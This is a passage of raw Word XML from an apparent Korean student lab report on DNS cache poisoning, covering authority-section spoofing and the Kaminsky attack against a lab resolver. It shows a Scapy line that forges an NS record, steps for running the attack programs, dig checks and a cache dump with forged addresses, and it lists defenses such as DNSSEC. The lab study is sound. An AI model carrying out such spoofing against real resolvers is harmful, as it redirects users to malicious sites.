      </w:pPr>
      <w:r w:rsidRPr="00F10630">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NSsec = DNSRR(rrname=target_domain, type='NS', ttl=259200, rdata=ns_domain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479C6E98" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b/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 로컬 DNS 서버는 DNS 응답을 받을 때 Authority Section에 있는 네임서버 정보를 신뢰하고 캐시에 저장한다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>- 공격자는 이를 악용하여 가짜 네임서버(‘ns.attacker32.com’)를 삽입함으로써, 이후 모든 ‘example.com’ 관련 요청이 공격자의 네임서버로 가게 만든다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/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DNS Cache Poisoning Attack: Authority Section 감염 과정</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>*캐시 초기화 주의 rnd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>1) 사용자가 ‘www.example.com’ 요청 → 로컬 DNS 서버에 전달</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>2) 공격자가 가짜 응답 전 → ‘example.com’의 네임서버를 ‘ns.attacker32.com’으로 지정.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>3) 로컬 DNS 서버 캐시 오염 → 이후 ‘example.com’ 요청 시 공격자의 네임서버에 문의.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>4) 공격자 네임서버가 가짜 IP 응답 → 사용자가 악성 사이트로 리디렉션됨.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574B8A52" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b/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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNS Cache Poisoning Attack: Authority Section 감염 전 결과</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a8"/>
        <w:tblW w:w="925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00"/>
        <w:gridCol w:w="4755"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E65B3A" w14:paraId="1D5AA46D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="3416"/>
        </w:trPr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6421C" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="240" w:after="240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  <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve">$ dig </w:t>
            </w:r>
            <w:hyperlink r:id="rId8">
              <w:r w:rsidR="00E65B3A">
                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>www.example.com</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="68FA0208" wp14:editId="5A2CD13C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171450</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2724150" cy="2082800"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides" distT="114300" distB="114300" distL="114300" distR="11430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082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2E93C" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="240" w:after="240"/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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0463CCF5" wp14:editId="03BA8489">
                  <wp:extent cx="2724150" cy="2082800"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="3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082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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>$ dig abc.example.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3962A637" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="188F63CD" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b/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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNS Cache Poisoning Attack: Authority Section 감염 후 결과</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a9"/>
        <w:tblW w:w="927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00"/>
        <w:gridCol w:w="4770"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E65B3A" w14:paraId="45BEBF79" w14:textId="77777777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45E74" w14:textId="77777777" w:rsidR="00E65B3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highlight w:val="yellow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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="257B31B8" wp14:editId="022F314B">
                  <wp:extent cx="2724150" cy="2082800"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="13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082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  <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve">$ dig </w:t>
            </w:r>
            <w:hyperlink r:id="rId12">
              <w:r w:rsidR="00E65B3A">
                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>www.example.com</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6CD85DB5" w14:textId="77777777" w:rsidR="00E65B3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IP가 감염된 것을 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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FD33A" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6782CEBA" wp14:editId="2041B687">
                  <wp:extent cx="2724150" cy="2070100"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="9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070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FA73640" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>$ dig abc.example.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CD941D1" w14:textId="77777777" w:rsidR="00E65B3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IP가 감염된 것을 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E65B3A" w14:paraId="321B5A0F" w14:textId="77777777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468E9" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
            <w:pPr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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="14041450" wp14:editId="7B8C0E89">
                  <wp:extent cx="2724150" cy="2070100"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="7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070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6F99853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$ dig ns.attacker32.com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br/>
              <w:t>여전히 공격자 IP인것을 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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56E49" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRPr="00F10630" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="471696EE" wp14:editId="48A8F75C">
                  <wp:extent cx="2724150" cy="2057400"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="10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057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F10630">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00F10630">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">$ dig @ns.attacker32.com </w:t>
            </w:r>
            <w:hyperlink r:id="rId16">
              <w:r w:rsidR="00E65B3A" w:rsidRPr="00F10630">
                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:u w:val="single"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>www.example.com</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="7874C0F4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ns.attacker32.com를 통해 접속하여 IP 감염 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E5AD03B" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="15266887" wp14:editId="7D84D04A">
            <wp:extent cx="3948113" cy="1102778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11027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F35F05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local DNS server의 DNS cache에 ‘1.2.3.5’, ‘1.2.3.6’이라는 조작된 IP가 들어간 것을 확인할 수 있다. 이는 example.com에 관한 모든 요청이 가짜 네임서버인 ns.attacker32.com을 통해 실행됨을 알 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9118C1" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C6FB16D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추가로 ‘_.example.com.’에대해 10.9.0.153이라는 결과가 나타난 이유는 정상 DNS 응답이 먼저 도착했을 가능성과 와일드카드 레코드나 네임서버 설정이 ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>10.9.0.153’, ‘1.2.3.5’, ‘1.2.3.6’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으로 설정된 상태에서 변경되지 않았을 가능성이 있다.하지만 해당 실험에서는 IP가 변경되었기 때문에 이 확률은 매우 낮을 것이다. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w: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 xml:space="preserve"> 또 다른 이유로는 코드에서 Authority Section만 스푸핑된 경우, 네임서버 정보는 조작되었지만 개별 서브도메인의 A 레코드는 기존의 값으로 남아 있는 경우에 이러한 상황이 발생할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F69277" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="055DC06B" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78AB6C89" w14:textId="635C11EF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4. The Kaminsky Attack에 대해서 조사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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*reference2 파일 참고(공격 과정을 전체적으로 요약)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636FAF4A" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA49CE6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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The Kaminsky Attack 개념</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNS Cache Poisoning은 DNS 서버의 캐시를 악의적으로 변조하여 사용자를 원래 목적지 대신 악성 사이트로 리디렉션하는 공격이다. Kaminsky Attack은 이러한 DNS 캐시 포이즈닝의 한 형태로, 무작위로 생성된 하위 도메인을 이용해 지속적으로 공격을 시도한다. 공격자는 피해 DNS 서버에 무작위 서브도메인 쿼리를 발송하고, 동시에 스푸핑된 DNS 응답을 전송한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C23F66E" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="24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이 공격은 DNS 서버가 무작위로 생성된 트랜잭션 ID를 이용해 응답을 수락하는 구조적 취약점을 악용한다. 공격자는 캐시 타임아웃을 기다릴 필요 없이 새로운 무작위 서브도메인을 생성하여 지속적으로 공격을 수행할 수 있다. 스푸핑된 응답이 수락되면, 피해 DNS 서버의 캐시에는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>example.com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의 네임서버 정보가 공격자의 네임서버(예: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ns.attacker32.com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)로 설정된다. 이후, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>example.com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도메인에 대한 모든 쿼리는 공격자의 네임서버로 전달되며, 사용자는 악성 사이트로 리디렉션되거나 악성 소프트웨어에 감염될 위험에 처하게 된다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB18964" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The Kaminsky Attack 특징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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1) 랜덤 서브도메인 쿼리 발송: 공격자는 피해 DNS 서버에 랜덤한 서브도메인 (예: twysw.example.com)에 대한 DNS 쿼리를 보낸다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>2) DNS 쿼리 생성: 피해 DNS 서버는 example.com의 권한 있는 DNS 서버에 쿼리를 보낸다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>3) 스푸핑된 DNS 응답 전송: 공격자는 빠르게 많은 수의 스푸핑된 DNS 응답을 전송하며, 각 응답에는 무작위로 생성된 트랜잭션 ID를 포함한다. 스푸핑된 응답에는 example.com 도메인의 권한 있는 네임서버를 공격자가 소유한 서버(예: ns.attacker32.com)로 설정하는 Authoritative Nameservers 레코드가 포함된다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>4) 트랜잭션 ID 매칭: 스푸핑된 응답 중 하나가 피해 DNS 서버의 쿼리와 트랜잭션 ID가 일치하고, 정식 응답보다 먼저 도착하면 DNS 서버는 이를 신뢰하고 캐시에 저장한다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>5) 캐시 중독 성공: 성공적으로 중독되면 피해 DNS 서버는 example.com에 대한 모든 쿼리를 공격자의 네임서버로 전달한다. 이후, 사용자가 www.example.com을 방문하면 공격자가 설정한 악성 IP로 리디렉션된다.캐시 타임아웃을 기다리지 않고 연속적인 공격이 가능하다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>6) 트랜잭션 ID 예측: DNS 응답의 트랜잭션 ID는 16비트로, 공격자는 가능한 모든 트랜잭션 ID를 빠르게 전송한다. 확률적으로 공격이 성공할 가능성이 높다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w: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>7) 캐시 우회: 매번 새로운 서브도메인을 사용해 캐시 타임아웃을 기다릴 필요 없이 지속적으로 공격할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F09A57" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="24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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격 방어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br/>
        <w:t>- 감염된 도메인에 대한 모든 쿼리는 공격자의 네임서버로 전달되며, 사용자는 악성 사이트로 리디렉션되거나 악성 소프트웨어에 감염될 위험에 처하게 되어 공격 방어가 필요하다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>1) DNSSEC 활성화: DNS 보안 확장(DNSSEC)을 통해 응답의 무결성을 검증할 수 있다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>2) 랜덤 소스 포트: 쿼리 시 소스 포트를 무작위로 설정하여 스푸핑된 응답이 일치할 확률을 낮춘다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645DF3B7" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="035B93EB" w14:textId="0FF27415" w:rsidR="00E65B3A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>5. The Kaminsky Attack 기초</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B464914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*Sample 코드 활용</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026E72A4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*공격 실행 및 결과 설명을 위한 일부 코드를 (필요시) 첨부하고 전체 코드는 부록에 첨부</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6230A01E" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E7B94FC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Kaminsky Attack은 DNS 캐시 중독 공격으로, 로컬 DNS 서버가 악성 네임 서버(NS)를 신뢰하도록 속여 특정 도메인의 DNS 쿼리를 조작한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660F8294" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:num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problem5_dns 관련 파이썬 코드를 실행해 bin(ip_req(요청 패킷), ip_resp(위조된 DNS 응답 패킷)) 파일 생성  (6번에서 활용)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C114B58" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:num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problem5_attack.c`를 컴파일하고 실행하여 위조 응답 전송</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E84582B" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:num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rndc dumpdb -cache`로 DNS 캐시에서 악성 네임 서버 확인(캐시 중독 확인)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7637445B" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:num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사용자 컨테이너에서 `dig`로 악성 네임 서버가 응답하는지 확인</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414655FD" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="aa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3"/>
        <w:gridCol w:w="4513"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E65B3A" w14:paraId="40063B2A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="3795"/>
        </w:trPr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D9936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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6B37B17F" wp14:editId="52A156B0">
                  <wp:extent cx="2728913" cy="2070539"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2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913" cy="207053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BCB7F57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ns_ip 확인</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68E0F476" w14:textId="77777777" w:rsidR="00E65B3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  <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve">$ dig </w:t>
            </w:r>
            <w:hyperlink r:id="rId19">
              <w:r w:rsidR="00E65B3A">
                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>www.example.com</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc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F3420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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="12877A07" wp14:editId="72611B15">
                  <wp:extent cx="2392260" cy="2046610"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="18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260" cy="20466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4F809F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c코드 (공격)실행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br/>
              <w:t>컴파일 후 attack_pb6 실행</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E65B3A" w14:paraId="758A92A3" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="3992"/>
        </w:trPr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88735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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1258EBD8" wp14:editId="785C70A4">
                  <wp:extent cx="2724150" cy="2044160"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="14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1"/>
                          <a:srcRect b="10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0441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A07EB00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공격 실행 후 IP가 변경된 것 확인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br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve">$ dig </w:t>
            </w:r>
            <w:hyperlink r:id="rId22">
              <w:r w:rsidR="00E65B3A">
                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>www.example.com</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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F2450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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0D5A461B" wp14:editId="5B403D51">
                  <wp:extent cx="2724150" cy="1386935"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="8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3"/>
                          <a:srcRect b="40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869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1B0C537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DNS의 chache dump로 공격 확인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br/>
              <w:t>(attack 문자열 감지)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6028783E" w14:textId="77777777" w:rsidR="00E65B3A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공격 실행 후 IP가 1.2.3.5로 변경되고 cache를 통해 공격에 성공한 것을 알 수 있다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>(감염 전 결과는 3번와 같다.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B99CB0D" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="260F741C" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
